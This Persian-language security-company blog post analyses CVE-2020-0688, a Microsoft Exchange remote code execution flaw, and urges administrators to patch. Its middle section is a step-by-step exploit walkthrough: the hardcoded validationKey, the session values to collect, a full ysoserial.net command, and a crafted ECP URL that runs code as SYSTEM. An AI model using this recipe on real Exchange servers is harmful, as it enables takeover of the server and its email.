عملیات امنیت

آسیب پذیری بسیار مهم برای Microsoft Exchange

آسیب پذیری بسیار مهم برای Microsoft Exchange

آسیب پذیری بسیار مهم برای Microsoft Exchange

CVE-2020-0688: اجرای کد به صورت از راه دور[1] روی Microsoft Exchange Server با استفاده از کلیدهای رمزنگاشتی ثابت

در آخرین اصلاحیه[2] انتشاریافته، مایکروسافت، برای رسیدگی به یک باگ "اجرای کد به صورت از راه دور" در Microsoft Exchange Server، یک اصلاحیه با درجه شدت "با اهمیت"[3] منتشر کرد. این آسیب‌پذیری توسط یک پژوهشگر ناشناس گزارش شده و روی همه نسخه‌های پشتیبانی شده از Microsoft Exchange تا زمان انتشار اصلاحیه اخیر تاثیرگذار است.

در ابتدا، مایکروسافت، دلیل این باگ را یک آسیب‌پذیری "خرابی حافظه"[4] ذکر و بیان کرد که با ارسال یک "ایمیل به طور خاص ساخته شده" به یک سرور Exchange آسیب‌پذیر، امکان بهره‌برداری از این باگ وجود دارد. در ادامه، مایکروسافت در بیانیه خود تجدیدنظر کرده و (به درستی) بیان کرد که این آسیب‌پذیری از ناتوانی سرور Exchange در تولید مناسب کلیدهای یکتا در زمان نصب ناشی می‌شود.

به طور مشخص، این باگ در مولفه Exchange Control Panel (ECP) یافته شده است. ماهیت این باگ کاملا ساده است. به جای داشتن کلیدهای تولید شده به صورت تصادفی در هر نصب، تمام نصب‌های Microsoft Exchange Server دارای مقادیر یکسان validationKey و decryptionKey در web.config هستند. این کلیدها برای تامین امنیت ViewState استفاده می‌شوند. ViewState داده سمت سروری است که برنامه‌های کاربردی تحت وب ASP.NET در قالب سریال‌شده[5] در سمت کارخواه[6] ذخیره می‌کنند. کارخواه این داده‌ها را از طریق پارامتر درخواست __VIEWSTATE به سمت سرور بازمی‌گرداند.

آسیب پذیری بسیار مهم برای Microsoft Exchangeشکل 1. قسمتی از فایل web.config شامل validationKey ثابت

به دلیل استفاده از کلیدهای ثابت، یک مهاجم احراز هویت‌شده می‌تواند سرور را به deserialize کردن داده‌های ViewState ساخته شده به طور بدخواهانه فریب دهد. با کمک YSoSerial.net، یک مهاجم می‌تواند به اجرای کدهای .NET دلخواه در چارچوب برنامه‌ی تحت وب Exchange Control Panel که به عنوان SYSTEM اجرا می‌شود، بپردازد.

برای بهره‌برداری از این آسیب‌پذیری لازم است تا مقادیر ViewStateUserKey و VIEWSTATEGENERATOR را از یک نشست احراز هویت‌شده جمع‌آوری کنیم. ViewStateUserKey را می‌توان از کوکی SessionID به دست آورد درحالیکه __VIEWSTATEGENERATOR را می‌توان در یک فیلد مخفی یافت.

تمام این مقادیر را می‌توان به سادگی و با استفاده از ابزارهای استاندارد توسعه‌دهندگان در مرورگر به دست آورد.

برای شروع، به صفحه “/ecp/default.aspx” رفته و وارد سیستم شوید. حساب کاربری استفاده شده نیازی به داشتن هیچ امتیاز[1] خاصی ندارد. در این مثال، از یک حساب کاربری با نام user استفاده می‌کنیم:

 

[1] Privilege

آسیب پذیری بسیار مهم برای Microsoft Exchange

برای ادامه، لازم است تا اطلاعاتی را جمع‌آوری کنیم. تا بدین‌جا، با ارزش‌ترین قسمت را به دست آورده‌ایم:

validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

validationalg = SHA1

برای به دست آوردن ViewStateUserKey و  __VIEWSTATEGENERATOR، تب Network از Dev Tools (F12) را باز کرده و درخواست را با فشردن F5 مجددا ارسال کنید. حال به پاسخ خام[8] درخواست ارسال شده به “/ecp/default.aspx”، درحالیکه در سیستم هستیم، نیاز داریم.

آسیب پذیری بسیار مهم برای Microsoft Exchange

همانطور که مشاهده می‌کنید مقدار __VIEWSTATEGENERATOR در Source صفحه قابل‌رویت است. در این مثال، مقدار آن برابر با B97B4E27 است. به احتمال زیاد، مقدار شما نیز همین خواهد بود. در ادامه، تب Headers را باز کرده و کوکی ASP.NET_SessionId را در سرآیندهای[9] درخواست بیابید:

در این مثال، این مقدار برابر با 05ae4b41-51e1-4c3a-9241-6b87b169d663 است.

حال، تمام اطلاعات موردنیاز برای پیش بردن یک حمله را در اختیار داریم:

--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

--validationalg = SHA1

--generator = B97B4E27

--viewstateuserkey = 05ae4b41-51e1-4c3a-9241-6b87b169d663

گام بعد عبارت است از ایجاد یک Payload با استفاده از ysoserial.net. یک Payload تولید می‌کنیم که با ایجاد فایل “C:\Vuln_Server.txt” نشان‌دهنده اجرای کد باشد:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/Vuln_Server.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

آسیب پذیری بسیار مهم برای Microsoft Exchange

در نهایت، نیاز داریم تا Payload (ViewState) را به صورت URL کدگذاری کرده و با جایگزینی generator و ViewState کدگذاری شده به صورت URL به دست آمده در بالا، یک URL به صورت زیر ایجاد کنیم:

/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

در ادامه، URL به دست آمده را به سادگی با قرار دادن آن در نوار آدرس مرورگر به سرور Exchange ارسال می‌کنیم:

آسیب پذیری بسیار مهم برای Microsoft Exchange

سرور یک 500 Unexpected Error بازمی‌گرداند اما حمله به طور موفقیت‌آمیز به اتمام می‌رسد. برای بررسی تاثیر بر روی سرور هدف:

آسیب پذیری بسیار مهم برای Microsoft Exchange

مطمئنا، اکنون فایل “Vuln_Server.txt” موجود است. بررسی اطلاعات مربوط به مالکیت در فایل تایید‌کننده این مهم است که این فایل توسط فرایندی با توکن SYSTEM ایجاد شده است.

آسیب پذیری بسیار مهم برای Microsoft Exchange

این مساله نشان‌دهنده این است که یک مهاجم قادر است به عنوان SYSTEM به اجرای کدهای دلخواه بپردازد و به طور کامل سرور Exchange هدف را Compromise کند.

نتیجه

مایکروسافت این آسیب‌پذیری را به عنوان CVE-2020-0688 در فوریه 2020 Patch کرد. بر اساس بیانیه نوشته شده توسط آن‌ها، این آسیب‌پذیری با اصلاح نحوه تولید کلیدها توسط Microsoft Exchange در فرایند نصب برطرف شده است. به بیان دیگر، اکنون آن‌ها کلیدهای رمزنگاشتی را در زمان نصب به صورت تصادفی انتخاب می‌کنند. مایکروسافت این آسیب‌پذیری را به عنوان یک آسیب‌پذیری با شدت مهم درجه‌بندی کرده است. احتمالا، دلیل اعطا این درجه به این آسیب‌پذیری این است که یک مهاجم باید در ابتدا احراز هویت شود. با این حال، باید ذکر شود که در یک شرکت، به هر کاربری اجازه داده می‌شود تا به سرور Exchange احراز هویت شود. به طور مشابه، هر مهاجم بیرونی که دستگاه یا Credentialهای یک کاربر شرکت را Compromise کرده باشد می‌تواند کنترل سرور Exchange را به دست گیرد. پس از تحقق این امر، مهاجم در موقعیتی قرار می‌گیرد که می‌تواند ارتباطات ایمیلی شرکت را افشا یا تحریف کند. بر این اساس، اگر مدیر یک سرور Exchange هستید، باید این Patch را از درجه اهمیت "حیاتی"[10] در نظر گرفته و در اولین فرصت ممکن آن را به کار گیرید. مایکروسافت درجه Exploit Index این آسیب‌پذیری را 1 بیان کرده که این بدین معنی است که آن‌ها انتظار دارند تا تنها در بازه‌ای30 روزه از انتشار Patch مربوطه، شاهد بهره‌برداری از این باگ باشند. همانطور که نشان داده شده، این قطعیت محتمل به نظر می‌رسد.

 

[1] Remote code execution

[2] Patch

[3] Important

[4] Memory corruption

[5] Serialized

[6] Client

[7] Privilege

[8] Raw

[9] Headers

[10] Critical

محصولات و خدمات حوزه امنیت اطلاعات و امنیت شبکه

دارای تاییدیه از مراجع معتبر داخلی و خارجی | نصب در مراکز معتبر | با افتخار تولید ایران


مشاوره با کارشناسان امنیت اطلاعات و امنیت شبکه

شرکت APK (امن پردازان کویر) در راستای اهداف خود آماده است تا به سازمانها ، شرکتها و واحدهای صنعتی مشاوره تخصصی در حوزه امنیت اطلاعات و امنیت شبکه را بصورت رایگان ارایه نماید

نظرات (0)

هیچ نظری در اینجا وجود ندارد

نظر خود را اضافه کنید.

  1. ارسال نظر بعنوان یک مهمان ثبت نام یا ورود به حساب کاربری خود.
0 کاراکتر ها
پیوست ها (0 / 3)
مکان خود را به اشتراک بگذارید

شبکه‌های اجتماعی

عضویت در خبرنامه

مطالب شگفت انگیز ، در صندوق ورودی شما

بروزترین مقالات در زمینه های :امنیت اطلاعاتامنیت شبکهعملیات امنیت
عملیات امنیت

شرکت امن‌پردازان کویر (APK) از شرکت‌های پیشگام کشور در حوزه‌ی ارائه خدمات امنیت س

عملیات امنیت

انتخاب یکی از گزینه‌های "همکاری با یک MSSP برای مدیریت امنیت" یا "خر

عملیات امنیت

امروزه به هر قسمت از امنیت که نگاه کنیم با اصطلاحات یادگیری ماشین

عملیات امنیت

کاربرد یادگیری ماشین در تجزیه و تحلیل رفتار کاربران و موجودیت‌ه

تهران - بلوار كشاورز، خيابان شهيد نادري پائين تر از خيابان ايتاليا، پلاك ۲ واحد ۵۰۵
۷۳ ۴۲۲ (۰۲۱)
۴۲۲۳۸۰۰۰ (۰۲۱)
۱۴۱۶۶۱۳۶۶۹
info{at}apk-group.net
یزد - خیابان شهید دکتر چمران، روبـروی کارخانه درخشان
۳۶۲۹۰۹۹۰ (۰۳۵)
۸۹۱۶۷۱۵۹۵۷

 امن پردازان کویر

Search